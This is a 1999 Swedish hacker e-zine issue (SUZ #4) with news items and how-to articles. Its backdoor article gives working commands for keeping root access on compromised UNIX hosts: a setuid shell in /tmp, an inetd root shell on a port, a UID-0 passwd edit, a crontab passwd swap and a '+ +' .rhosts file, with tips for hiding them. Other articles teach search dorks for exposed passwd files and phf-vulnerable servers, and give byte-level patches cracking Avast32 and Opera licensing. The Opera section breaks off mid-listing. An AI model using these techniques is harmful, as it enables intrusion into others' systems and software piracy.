OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
____________________________________________________________________________
=======S====T====A====R====T=========O=====F=========F====I====L====E=======
S W E H A C K
U N D E R G R O U N D
______ _____ __ _ _______
____/ | | \ | |______
/_____ __|__ | \_| |______
N U M M E R 4
____________________________________________________________________________
I N N E H Å L L I S U Z # 4 [0.1]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
¤ Innehåll..............................................................0.1
¤ Disclaimer............................................................0.2
¤ Medarbetare...........................................................0.3
¤ Ledare................................................................0.4
{s w e h a c k}
¤ Kanalen...............................................................1.1
¤ Hemsidan..............................................................1.2
{h / p / v / c / a}
¤ Bakdörrar i UNIX system...............................................2.1
¤ AntiOnline bygger ut..................................................2.2
¤ Sök och finn..........................................................2.3
¤ Unik lagstiftning i Norge.............................................2.4
¤ Så crackar man Avast32................................................2.5
¤ Gud stöttar Flashback.................................................2.6
¤ Så crackar man Opera 3.51.............................................2.7
¤ Krascha Netscape......................................................2.8
¤ Hyperlänkar...........................................................2.9
____________________________________________________________________________
D I S C L A I M E R [0.2]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
All information i denna filen är skriven i utbildnings syfte. Ni kan aldrig
komma och påstå att denna filen uppmanar till brott eller något annat olag-
ligt. Allt ni gör efter att ni läst något ur denna filen är helt på er egen
risk och ni har själv allt ansvar för följderna. Vi avskriver oss härmed
allt ansvar för era handlingar.
____________________________________________________________________________
M E D A R B E T A R E [0.3]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Gazzaud -=- [gazzaud@operamail.com]
IP HIJACKER -=- [---]
med flera...
____________________________________________________________________________
L E D A R E [0.4]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Här kommer SUZ #4. Tidningen har ändrat lite i uppläggningen inför detta
numret. T.ex. så har "fasta avdelningar" försvunnit eftersom ni läsare som
hört av er med kritik har tyckt detta. Ni tyckte inte den innehöll någon
vettig information och att den lika gärna kunde slopas. Eftersom SUZ's
uppläggning, innehåll mm. bestäms av läsarna så var det inte särskilt svårt
att ta bort avdelningen. Jag hoppas att ni alla tycker detta är bra. Om inte
så hör av er.
Det har varit en del oklarheter när det gäller vilka e-mail adresser man ska
använda. Jag tänker nu göra klart det en gång för alla.
<suz@linux.nu> - Används för att starta eller avsluta en prenumeration.
Observera att inga e-mail till denna adressen kommer att
bli lästa av någon person. E-mail som ni vill ska bli lästa
skickas till <swehack@linux.nu>.
Subscribe - För att starta ska man skicka ett e-mail med "Subscribe" som
(Starta) "subject". (Använd inte citattecken ("").)
Unsubscribe - För att avsluta ska man skicka ett e-mail med "Unsubsribe"
(Avsluta) som "subject". (Använd inte citattecken ("").)
<swehack@linux.nu> - Används för frågor, kommentarer, artiklar mm. som berör
Swehack eller något av deras projekt som t.ex. SUZ.
<con@linux.nu> - Använs för frågor, kommentarer och annat som berör mig.
Kommentarer angående SUZ skickas till <swehack@linux.nu>.
ska läsa.
En del kan få problem när de läser SUZ eftersom SUZ använder en layout som
bygger på att läsarna använder något s.k. monospace-typsnitt. Monospace-
typsnitt är typsnitt där alla tecken är lika breda, exempel på sådana
typsnitt är courier och geneve. Times är ett exempel på ett typsnitt som
inte är ett monospace-typsnitt. Om ni av någon anledning inte vill använda
ett monospace-typsnitt när ni läser er e-mail så går det även bra att läsa
SUZ på WWW. Om ni läser SUZ i notepad så fungerar det också bra.
Som vanligt så ber vi er att skicka oss artiklar, nyheter, länkar, inlägg,
annonser mm. för publicering i nästa nummer. Gör Ni det så kommer
förhoppningsvis nästa nummer av SUZ ut som planerat, alltså någon gång i
nästa månad.
Tankar och idéer på vad som kan förbättras tags också tacksamt emot.
Information is free - take it or leave it!
// Contagion | con@linux.nu | 99-01-18
Allt rörande SUZ kan skickas till swehack@linux.nu
____________________________________________________________________________
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
<-------------------------<--<<---<<<--->>>--->>-->------------------------>
<-------------------------< S W E H A C K >------------------------>
<-------------------------<--<<---<<<--->>>--->>-->------------------------>
____________________________________________________________________________
K A N A L E N [1.1]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Kanalen har nu blivit utrustad med den omtalade botten. Det sitter med
"swehack-bot" som nickname. Den är inte helt färdigkonfigurerad än men den
är i varje fall igång och har än så länge gjort vad den ska. Det är chonic^
som sett till att den fungerar som den ska så vad mer kan jag säga än Tack!
Swehacks IRCkanal:....................#Swehack...DALnet (irc.dal.net)
____________________________________________________________________________
H E M S I D A N [1.2]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Hemsidan har ändrats en del sedan förra numret. Bl.a. har den fått en ny
rubrik och ett javascript har lagts till. Javascriptet känner av browser typ
för att sedan skicka vidare personen ifråga till rätt version av sidan.
Detta är nödvändigt då det tyvärr inte finns någon komplett standard för
DHTML. Filarkivet har som vanligt även utvidgas, om inte mycket så lite.
Jag vet att det finns mycket som kan förbättras men det är svårt att se alla
fel själv. Därför ber jag er om hjälp för att sajten ska kunna förbättras
ytterligare. Skicka mig några rader med dina tankar och idéer om sidan så
ska jag se vad jag kan göra för att förbättra den.
Swehacks hemsida:.....................http://www.flashback.net/~mm/swehack/
http://swehack.cjb.net/
____________________________________________________________________________
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
<-------------------------<--<<---<<<--->>>--->>-->------------------------>
<-------------------------< H / P / V / C / A >------------------------>
<-------------------------<--<<---<<<--->>>--->>-->------------------------>
____________________________________________________________________________
B A K D Ö R R A R I U N I X S Y S T E M [2.1]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Tänkte skriva en liten artikel om hur man kan lägga in bakdörrar i
UNIX/Linux system. Artikeln är som vanligt bara exempel och bör aldrig
utföras på så sätt att du skaffar dig tillträde till någon annans system....
Texten kommer bara att ange olika sätt att behålla root efter det att
du tagit den. Denna gång kommer jag att ta upp dessa enkla bakdörrar och
till nästa gång räknar jag med att jag har fixat ihop en fortsättning på
detta tema. Dom här bakdörrarna är enkla och snabba att placera i någons
system. Fortsättningen på texten kommer att behandla mer avancerade
bakdörrar men just nu får ni hålla tillgodo med dom här.
--< INNEHÅLL >--
1; Lämna ett skal i /tmp
2; Editera /etc/inetd.conf
3; Ändra /etc/passwd filen
4; Crontab
5; Rhosts
1; Lämna ett skal i /tmp
^^^^^^^^^^^^^^^^^^^^^^^^
Om du kopierar över /bin/sh som root till /tmp/sh och ändrar
rättigheterna på det så kan du nästa gång du kommer tillbaka enkelt gå
till /tmp och skriva ./sh så har du root igen. Vi går igenom hur.
----< Skapa bakdörren >---
#cp /bin/sh /tmp/sh <--- Kopiera över sh.
#chmod 4755 /bin/sh <--- Göra det till suid program
----< Använda den >----
%cd /tmp <--- Gå till /tmp där vårt skal ligger
%./sh <--- Aktivera skalet
# <--- Voila! Vår trevliga root prompt...
Oki, denna är väl nästan den enklaste du kan göra men är väldigt
effektiv. Ett tips är att inte döpa den till "sh" utan typ ".sys" eller
nåt så den inte syns lika väl. :)
2; Editera /etc/inetd.conf
^^^^^^^^^^^^^^^^^^^^^^^^^^
Denna bakdörr går ut på att istället för att det finns ett riktigt
program som faktisk skulle tänkas göra något vettigt så har du ett skal
som väntar på en port. Denna är också väldigt enkel att göra och i filen
/etc/inetd.conf så kollar vi lite...
telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd
Så kan det se ut på en rad i filen.
Om vi editerar den så här:
telnet stream tcp nowait root /bin/sh sh -i
så blir den ännu roligare. Då har vi ett root-skal som ligger och väntar
på dig så fort du kör telnet mot den hosten. Denna bakdörr är *extremt*
kraftfull eftersom vem som helst kan få full tillgång till den hosten.
Men det är en bakdörr i.a.f. så jag tänkte att den var bra. Du måste
sedan starta om inetd för att den ska fungera. Gör inte detta dagtid då
folk har en konstig förmåga att jobba då. Och lägg inte bakdörren på
telnet-porten heller. Lägg den på någon annan, typ time eller liknande.
3; Editera /etc/passwd filen
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Okej, detta är kanske den dummaste bakdörr som finns...
men vafan, vi kör ändå!
---< En ordinär passwd fil >---
johnD:czWSrK9ZleFSs:503:100:John Dumone:/home/johnD:/bin/bash
Richard:QwdsXeGdZcV2k:504:100:Richard Loyle:/home/Richard:/bin/bash
LisaR:EKYFkVtR6xEbs:505:100:Lisa R:/home/LisaR:/bin/bash
---< En mixtrad passwd fil >---
johnD:czWSrK9ZleFSs:0:0:John Dumone:/home/johnD:/bin/bash
Richard:QwdsXeGdZcV2k:504:100:Richard Loyle:/home/Richard:/bin/bash
LisaR:EKYFkVtR6xEbs:505:100:Lisa R:/home/LisaR:/bin/bash
Vi ändrade om lite i "johnD" kontot så han fick UID 0 och GID 0. Då är
han alltså root. Denna bakdörr hittas nog först av alla. Enkel och bra
för oövervakade system med en idiot som sysadm.
4; Crontab
^^^^^^^^^^
Denna bakdörr är gjord så att du kan logga in på hosten med ett konto
under en viss tidsperiod. En crontab fil är uppbyggd på följande sätt:
1 2 3 4 5 6
0 0 * * 1 /usr/bin/updatedb
1 = minut 2 = timme 3 = dag i månaden 4 = månad 5 = veckodagen
6 = Program som ska köras
Så då kan vi göra så att systemet byter ut passwd filen till en annan
som du har lagrad någonstans. Lägg till i crontab:
30 0 * * * /bin/mv /etc/passwd /tmp/.passwd
31 0 * * * /bin/cp /tmp/.nya_passwd /etc/passwd
30 1 * * * /bin/mv /tmp/.passwd /etc/passwd
Vad gör det där då? Det byter ut passwd filen mot en annan som du gömt i
/tmp klockan 00:30. Då har du en ny passwd fil som du kan logga in på.
Självklart har du ju fixat ett root konto på den nya passwd filen. Sen när
klockan blir 01:30 så byts passwd filen ut mot den gamla och allt blir
frid och fröjd...trodde sysadm.
5; Rhosts
^^^^^^^^^
Den här är också lite speciell. Man lägger till en fil i hemkatalogen för
det kontot man vill ha, sen när nu kör en "rlogin" från ditt UN*X/Linux
system så blir du den användaren direkt. Lägg till en fil i t.ex. / som
heter .rhosts som det står följande i:
+ +
Du kan även döpa den till .rlogin .
That´s all for now folks!
-----< IP HIJACKER >-----
RELKLAM!!!
Jolt Cola- Twice the caffeine
Linux- What do you want to do now?
Copyleft 1999
----------------------------------------------------------------------------
Skrivet av IP HIJACKER
----------------------------------------------------------------------------
____________________________________________________________________________
A N T I O N L I N E B Y G G E R U T [2.2]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AntiOnlines har beslutat sig för att utvidga sin sajt. Informationen på
deras nuvarande sajt kommer att placeras ut på flera olika domäner. De
kommer också att införa en hel del nytt på deras sidor. Det s.k. "The
AntiOnline Network" kommer att vara klart någon gång i mitten av februari.
Här nedan följer vilka domäner som kommer att finnas och vad de kommer att
innehålla.
www.AntiOnline.com
Det här domänet kommer att innehålla de senaste nyheterna från
underground världen. Det är 30 individer som kommer att arbeta på att
detta ska bli en lyckad plats. Dessa lyckliga 30 människorna har valts ut
från över 7 000 intresse-anmälningar.
www.AntiSearch.com
Detta kommer att bli en riktig höjdare. Här kommer man kunna söka i ett
stort index över undergroundsidor för att hitta just "det där". "The
AntiSearch spider" kommer att köras 24 timmar/dygn för att se till att
databasen alltid är uppdaterad.
www.IOMagazine.com
Detta kommer bli det nya hemmet för det populära I/O zinet. IOMagazine
kommer förövrigt att innehålla nerladdningsbara program, källkod mm.
www.AntiStore.com
Här kommer det finnas datorsäkerhets relaterade produkter att köpa. Även
hacking relaterade saker kommer att finnas.
www.AskBub.com
Här kommer man kunna få hjälp med sina säkerhets relaterade problem helt
gratis.
www.AntiOnline.org
AntiOnline startade sin sajt på ett 5 MB konto som deras founder, John
Vranesevich fick gratis av en vän. Nu kommer AntiOnline själva göra
samma sak; de kommer ge ut gratis konto till de som behöver. Detta gör
de eftersom de vill hjälpa folk att komma igång med sin verksamhet.
----------------------------------------------------------------------------
Skrivet av Contagion | con@linux.nu
Källa: AntiOnline, http://www.antionline.com/
----------------------------------------------------------------------------
____________________________________________________________________________
S Ö K O C H F I N N [2.3]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
En Kort Artikel Om Att Söka Och Finna
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Det här blir en kort artikel eftersom jag inte riktigt har tid, har fullt
upp med två olika programmeringsprojekt och högtiden som kallas Jul. Därför
blir det som vanligt, kort, koncist och utan utsvävningar (förutom den här
då :-).
-=- Den Som Söker Skall Finna -=-
Först går vi in på sökmotorn Altavista, denna jättelika ansamling av
information av det vidaste slag, som trots vissa försök till motsatsen
ligger öppen för alla som vet hur. Eftersom jag inte skapar mig några
illusioner om läsekretsen så går vi in på de tre områden som de flesta
använder Altavista till: Bakdörrar, Serialz och Phf-script. Även om jag är
tveksam till det första och sista fungerar de som exempel och jag har tagit
med dem eftersom de utgör en bas för att visa olika knep, samt viktigast av
allt, hålla intresset.
-=- Syntax -=-
Först några kommandon och liknande som är mycket användbara när man söker
efter saker och ting. ("") (+) (-). Bortse från parenteserna de fungerar
endast som seperatörer. "" runt ett ord indikerar en grupp ord som ska
letas efter tillsammans (ex "Master of Puppets"). + anger ett ord som MÅSTE
finnas med på sidan för att den ska räknas som en hit. - anger motsatsen.
Innehåller sidan det ordet så ska den sidan ignoreras. Självklart kan du
kombinera "" med + eller -. Vi har också domain och link som fungerar som
det grövsta kriteriet. Doman:edu till exempel returnerar bara sidor som
ligger på en domän med edu. Link:phf.cgi returnerar sidor som har en länk
som leder till phf.cgi. Användbart helt klart, nu över till lite exempel.
-=- Parent Directory No? -=-
För alla er snuskisar som letar bakdörrar har nog märkt att Altavista
numera hårdkodat bort "Parent Directory", men häng inte läpp för det. Gör
så att ni tar det dom glömde (varför "Parent Directory" när resten funkar
lika bra?) och slänger ihop med eran egen sexuella preferens eller intresse
och vips har du genast en massa bakdörrar.
+"Last Modified" +"Size" +pic +teen
eller
+"Last Modified" +"Name" +sex
eller
+"Last Modified" +"Name" +"01" -free
eller
+"Index Of" pic image
eller någon av de otaliga variationer som finns. Det kan vara så att den
sista av dessa "Index Of" också är bortkodad, men sådant märks. När jag
kontrollerade att det funkade hittade jag runt 10 bakdörrar med bara en av
metoderna. Fler finns, men dom försvinner snart. AltaVista gör sitt bästa
för att man inte ska hitta sådana här "misstag" i deras sökmotor men som ni
kommer se om ni läser vidare så finns det värre.
-=- Serial Cracker -=-
Eftersom ni redan lärt er de grundläggande knepen för att hitta saker så
går vi igenom lite mer övergripande metoder härnäst. Självklart ska ni
titta igenom olika FTP-sökmotorer innan ni kommer till Altavista eftersom
det ger er större chans att hitta något, men när ni väl hamnar på
AltaVista för att hitta ett crack/serial (förutsatt att ni inte kan cracka
det själva :-) försök samla lite information om programmet först vilket gör
att ni kan sålla bort mer skräp. När släpptes det? (sortera bort dokument
äldre än så), finns det flera versioner? (titta om ni kan hitta några
beskrivande cracks till äldre versioner (om ni läst min artikel om Opera så
vet ni att skydden inte ändrar sig så ofta från version till version)) och
så vidare. När man använder lite eftertanke innan brukar man spara in många
timmar av att ploga sig igenom skit för att hitta det man vill ha.
-=- The Golden Oldie -=-
Eftersom teknikerna på AltaVista alltid ligger steget efter (som det ska
vara eller hur? :-) så tror dom ofta alldeles för tidigt att dom fixat
olika "misstag". Ofta går det fortfarande att få fram samma resultat, det
gäller bara att tänka efter. För ett tag sedan var det till exempel vanligt
att hackers satt och sökte efter mis-indexerade /etc/passwd och /etc/group
filer. AltaVista hårdkodade bort det (verkar vara deras standardlösning)
och trodde allt var frid och fröjd tills någon knäckte ett edu nätverk med
just den metoden. Hoppsan. Samma sak gäller självklart PHF. De tror att de
fixat det, men med lite arbete är det precis som 'the good old days'. Den
gamla metoden med att söka efter PHF kommer mestadels ge er en massa brutna
länkar eller 'Candid Camera' meddelanden. Så eftersom vi letar efter en fil
går vi över till en FTP search. Finns några stycken och en är:
ftpsearch.ntnu.no. Eftersom ftp och http ofta ligger på samma maskin är det
bara att ersätta den funna ftp:n mot http och (tadaaa!) en maskin öppen för
PHF. Några exempel på PHF sökningar:
www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain%3Aedu+
%2Bcgi-bin+%2Bphf&search.x=21&search.y=12
http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain
%3Aedu+link%3Acgi-bin%2Fphf&search.x=55&search.y=5
http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=link%3
A cgi-bin%2Fphf&next.x=43&next.y=9
Ni får ursäkta radavbrotten.
-=- Before I leave -=-
Kunde ni alla dom här knepen och trixen redan (det är bara att AltaVista's
hjälp eller någon bra artikel) så fick ni ut väldigt av artikeln och ni får
ha överseende med det. Lärde ni er NÅGONTING så har denna lilla text i alla
fall ett LITET syfte. Vill ni gnälla eller i övrigt kommentera kan ni nå mig
på Gazzaud@hotmail.com eller #SweHack. Over and out.
----------------------------------------------------------------------------
Skrivet av Gazzaud | gazzaud@operamail.com
----------------------------------------------------------------------------
____________________________________________________________________________
U N I K L A G I N O R G E [2.4]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Norges Högsta domstol har nyligen beslutat att det inte är ett brott att
försöka bryta sig in i datorer, så länge man inte har brutit sig in i
systemet. Högsta domstolen slår också fast att den som har sin dator
ansluten till Internet måste acceptera att folk kommer att försöka ta sig in
på deras system och därför menar de att det är ägarens ansvar att skydda
sina datorer. I teorin kan alltså hackers från hela världen flytta till
Norge och helt lagligt leta efter säkerhetsluckor i datorer. Denna domen är
troligen den första av sitt slag.
----------------------------------------------------------------------------
Skrivet av Contagion | con@linux.nu
Källa: USA Today
----------------------------------------------------------------------------
____________________________________________________________________________
S Å C R A C K A R M A N A V A S T 3 2 [2.5]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Avast32 v7.70 - Crack Demo/Patch
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-=- Förord -=-
Ibland anstränger man sig i onödan. Blir så när man överskattar sin fiende.
Vad jag trodde var en komplicerad CRC-kontroll visade sig vara ett enkelt
patch-skydd. Så istället för att handla om ett avancerat skydd, kommer jag
beskriva kombinationen av två enkla. I efterordet tar jag upp hur de
SKULLE kunnat gjort för att göra crackingen till en smärre mardröm.
Självklart behöver jag inte säga att om ni planerar att använda det här
programmet längre än demo-perioden så ska ni köpa det. Som vanligt. En
annan sak. Den metod som jag använder här är varken den bästa eller den
enda metoden för att komma runt Avast32's skydd. Orsaken till det är att
jag är nybörjare på cracking. Så se det som en blinds rundtur igenom
taggtråden. Jag lyckades med vad jag föresatt mig. Den här gången. Vill du
gnälla på mig över ett dåligt crack, så låt bli, jag vet redan att det är
dåligt. Men det funkar. Därför duger det åt mig. Elegans kan jag vänta med
tills jag är duktig.
-=- Programbeskrivning -=-
Avast32 är ett avancerat anti-virus program som med både virus kontroll
och resident kontroll över misstänkta operationer ger Avast32 ett starkt
skydd mot virus. Uppdateringsdatabaser finns att ladda hem från deras sida
så att man hela tiden kan skydda sig mot det senaste virusen. Jag har inte
senaste databasen och har därför inte brytt mig om att kontrollera om
Avast32 skyddar mot NetBus och/eller Back Orifice.
-=- Demo is over - purchase -=-
När demo-perioden var över tänkte jag att jag skulle titta igenom
Avast32's skydd. Eftersom programmet i sig självt är avancerat (skrivet i
Microsoft Visual C++) tänkte jag att dom borde ha ett lika avancerat skydd.
Observera: Bara för att lära mig. Så jag sparkade igång WDasm tittade igenom
Avast32.exe och hittade inga strängreferenser. Så dom använder dynamisk
allokering. Jahapp. Så jag tittar efter funktioner som kan ha med det att
göra. Då ser man följande misstänkta funktioner:
AVBASIC._aswIsDemoMode@0
AVBASIC._aswIsPatched@0
AVBASIC._aswIsExpiredMode@0
AVBASIC.?ComputeChecksum@@YAKPAX@Z
AVBASIC.?ComputeChecksum@@YAKPAEK@Z
Orsaken till att dom lagt sina funktioner i en .DLL får vi snart reda på.
Det har inget med skyddet att göra utan är bara sund programmering. Men vi
öppnar Avbasic.dll i WDasm för att se vad dessa funktioner gör. Inte mycket.
De hämtar ett värde från en variabel. Roterar. And. Återvänder. Så vi börjar
med att invertera de hopp som ligger efter anropet till _aswIsDemoMode och
_aswIsExpiredMode. Då får vi upp en dialogruta som säger nånting i stil med:
"Ni använder en hackad version av Avast32 kontakta närmaste återförsäljare".
Hmmmmm... Inte hackad. Men snart väldigt crackad. Här hamnade jag på ett
sidospår. Jag tänkte att eftersom de har funktioner för att kontrollera sina
filers checksum borde dom använda dessa i crack-skyddet. Så jag gräver runt
lite i ?ComputeChecksum funktionerna men hittar ingenting som tyder på att
de används. Så jag startar SoftIce och sätter några brytpunkter. Det visar
sig att den går igenom _aswIsDemoMode, _aswIsPatched, _aswIsExpired men
också _aswIsAdmin. Lurigt. Jag som trodde den hade med deras övriga NT kod
att göra. Så vi tittar igenom vad som lämnas tillbaks av funktionerna i
Avbasic. Den hämtar sina värden från olika variabler, men alla slutar som
noll. Så vi får modifiera deras funktion lite. _aswIsAdmin är den som
anropas flest gånger så vi tittar på hur den ser ut.
10001590 A098560010 mov al,byte ptr [10005698] ; innehåller 43h
10001595 2401 and al,01 ; eax blir noll
10001597 c3 ret
10001598 90 ; var tacksam för dessa nop för
10001599 90 ; med min metod behövs dom
1000159A 90
1000159B 90
1000159C 90
1000159D 90
1000159E 90
1000159F 90
Så eftersom hoppena efter är inverterade borde funktionen alltid lyckas. Men
det verkar som jag missat några kontroller. Så vi gör så att funktionen
ALLTID lämnar tillbaks ett.
10001598 A098560010 mov al,byte ptr [10005698]
10001595 B801000000 mov eax,00000001
1000159A C3 ret
1000159B 90 ; färre nop's...
1000159C 90 ; det är för att följande funktion måste
1000159D 90 ; ligga på samma adress som förut, annars
1000159E 90 ; rasar hela skiten.
1000159F 90
Så nu funkar Avast32.exe. Men? Visst ja. Måste fixa Rgw32.exe också.
Eftersom den använder funktionerna i Avbasic.dll behöver du bara invertera
alla hopp och saken är biff. Nästan i alla fall. Om du tittar i rgw32.exe
under funktionen _aswExpiredMode@0 så har du en liten knepighet.
00403E8C E80B440000 call 0040829C ; _aswExpiredMode@0
00403E91 25FF000000 and eax,000000FF
00403E96 85C0 test eax,eax
00403E98 0F84E8000000 je 00403F86
JE satsen kan vara lite knepig att invertera om man är ny på cracking eller
assembler. Men ändra den till: E9E9000000. Jag vet. Den blir inte
inverterad utan blir en JMP-sats, men det är som det ska vara.
-=- Efterord -=-
Sådär nu ska Avast32 fungera igen och deras skydd besegrat. Det hade gått
en hel del fortare om jag inte överskattat deras skydd, men det är sådant
man lär sig antar jag. "Protectionists are a lazy bunch" för att citera
+ORC. Hade de istället för denna enkla metod använt checksum resultatet
(som nog bara används för att förhindra virus-infektion, jag ska
kontrollera saken bara för nyfikenhetens skull) antingen i ett call eller
jump sats helt och hållet utanför en enskild funktion (gärna med någon
ytterligare kontroll) skulle det blivit MYCKET svårare att cracka. Har jag
glömt något, missat något eller är allt för otydligt så kontakta mig på:
gazzaud@operamail.com
eller
#SweHack @ DALnet
Skriven Av:
R. G. Gazzaud
----------------------------------------------------------------------------
Skrivet av Gazzaud | gazzaud@operamail.com
----------------------------------------------------------------------------
____________________________________________________________________________
G U D S T Ö T T A R F L A S H B A C K [2.6]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Namnpiraterna Control-Alt-Delete stöttar Flashbacks ansvarige utgivare Jan
Axelsson genom att dela med sig av vinsten de får på tre domäner som de
säljer till högstbjudande. Gud.com hör till dessa domäner och nuvarande bud
ligger på 12 000 kronor, men budgivningen pågår fram till och med den 1
mars. DE andra två domänerna som kommer att auktioneras ut är Wallenberg.com
och Regeringen.com
Pengarna som Flashback får in till sin Rätthjälpsfond kommer att oavkortat
gå till rättegångskostnaderna och kostnaderna för skadeståndet som Flashback
blivit dömda att betala.
Tidningen Flashback publicerade nämligen år 1995 namn och foton på dömda
sexualbrottslingar. För detta har Jan Axelsson dömts att betala 50 000
kronor i skadestånd till en av brottslingarna. Flashback anser att
publiceringen var försvarbar, då uppgifterna bygger på offentliga handlingar
och är korrekta. Domen har överklagats.
Flashbacks hemsida:...................http://www.flashback.se/justice/
Control-Alt-Delete's hemsdia:.........http://www.controlaltdelete.com/
----------------------------------------------------------------------------
Skrivet av Contagion | con@linux.nu
Källa: Flashback, http://www.flashback.se/
----------------------------------------------------------------------------
____________________________________________________________________________
S Å C R A C K A R M A N O P E R A [2.7]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Opera 3.51 (Opera 3.50 BETA 11) - Seriell / Patch
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-=- Förord -=-
Ok, så jag sa att jag skulle låta bli framtida versioner av Opera, men
ibland kan man bara inte låta bli. De har drastiskt förbättrat sitt skydd
och det tog faktiskt ganska lång tid för mig att knäcka det (i.a.f. jämfört
med tidigare versioner). För alla er som läst MyWord VI (inte allt för
många, så det här får nästan räknas som reklam ;-) kommer ihåg att Opera
3.50 BETA 10 var ganska enkelt att 'fixa'. Det var bara att leta upp
strängreferensen, spåra en bit bakåt och ändra 2 byte för att få hela
programmet att fungera. Antagligen tog sig utvecklarna en djup funderare
efter det, för en drastisk uppgradering skedde. MEN. Följande artikel är
främst riktad till de som vill LÄRA sig cracking. Alla som vill stjäla
deras program kan vänta tills det dyker upp serialz eller crackz på alla
de tusentals warez siter som finns överallt. Det besparar er en hel del
möda. Som jag sa i MyWord VI (mer reklam, reklam, reklam) gillar jag den
här browsern som trots oschysst konkurrens och fula knep från främst
Micro$oft lyckats etablera sig på en stenhård marknad. När alla andra åkt
snålskjuts på Mosaic har Opera utvecklats ur ingenting, byggt helt och
hållet på egen teknik. Så stöd Opera om ni kan och köp en licens och använd
programmet lagligt. För er som inte har råd/vill/kan/orkar/gitter köpa en
licens följer här ett fullt funktionsdugligt crack.
-=- Tools of the Trade -=-
WDasm 8.x
Hexeditor (HexWorkshop är bra)
-=- Chasing the String of fortune -=-
Det allra första som jag brukar göra när jag har fått ett nytt mål är att gå
igenom strängreferenserna, så även denna gång.
"This evaluation version has expired"
Ser ut och vara vad vi letar efter. Så vi börjar spåra bakåt bara för att
finna att funktionen är anropad dynamiskt. Så hur kan man veta om en
funktion är dynamiskt anropad? När du kommer till början av funktionen och
du inte har några referenser och koden ovanför absolut inte har med saken
att göra, då vet du att den är dynamiskt anropad. Troligen har dom gjort
just så för att förhindra den metod som använts på tidigare versioner. Vi
kontrollerar de andra sträng referenserna bara för säkerhetsskull och finner
att de anropas på exakt samma vis.
-=- The pot of gold beneath the .DLL -=-
Så då kontrollerar jag om det finns några importerade funktioner som kan ha
med skyddet att göra. Nix. Bara för att vara på säkra sidan kontrollerar jag
alla .DLL:er för att se deras exporterade funktioner, fortfarande ingenting.
-=- Don't waste my time -=-
Dags att börja zen-crackingen. Ladda upp en dos tålamod och börja spåra på
allvar. Vi vet att programmet måste kontrollera nuvarande tid mot tiden då
det vart installerat för att se om utvärderingsperioden är över. Att gå
igenom alla dessa referenser tar en stund så jag ska bespara er den tiden.
-=- SPLASH! -=-
Eftersom varken ni eller jag har tålamodet som krävs för att gå igenom alla
dessa referenser för kontroll av tid (det blir några stycken) ska jag
presentera en annan metod. Ni vet rutan som dyker upp när du startar Opera
där det står antingen Registered To: [Unregistered] eller snart Registered
To: endast. Den 'skylten' kallas av utvecklarna för en 'splash screen'. Så
vi kollar igenom referenser för 'splash' och '(unregistered)'. Vi hittar
(bl.a.) funktionen 00494907 (skapar själva Splash-screenen), spårar bakåt
lite och hamnar:
004876B0 E8789AFDFF call 0046112D
; Kontrollerar om användaren valt bort splash
004876B5 85C0 test eax,eax
004876B7 7407 je 004876C0
004876B9 57 push edi
004876BA E848D20000 call 00494907
; Skapar splash-screenen
Vad hittar vi inte lite längre ner? En funktion för tid/datum. Hoppsan,
hoppsan. Vi är definitivt på rätt väg. I vilken riktning du än går nu stöter
du på funktionen 0045E045. Så vi tittar igenom den.
Call 004B722E; hämtar & kontrollerar tid
Call 004E1683; kontrollerar om viss tid (ett dygn)
; förflutit sedan förra kontrollen
Call 004B6ECC; kontroll om registrerad
Bingo! Guldet är funnet och Opera snart fixat (igen).
004B6ECC 8D8138010000 lea eax,dword ptr [ecx+00000138]
004B6ED2 85C0 test eax,eax
004B6ED4 741A je 004B6EF0
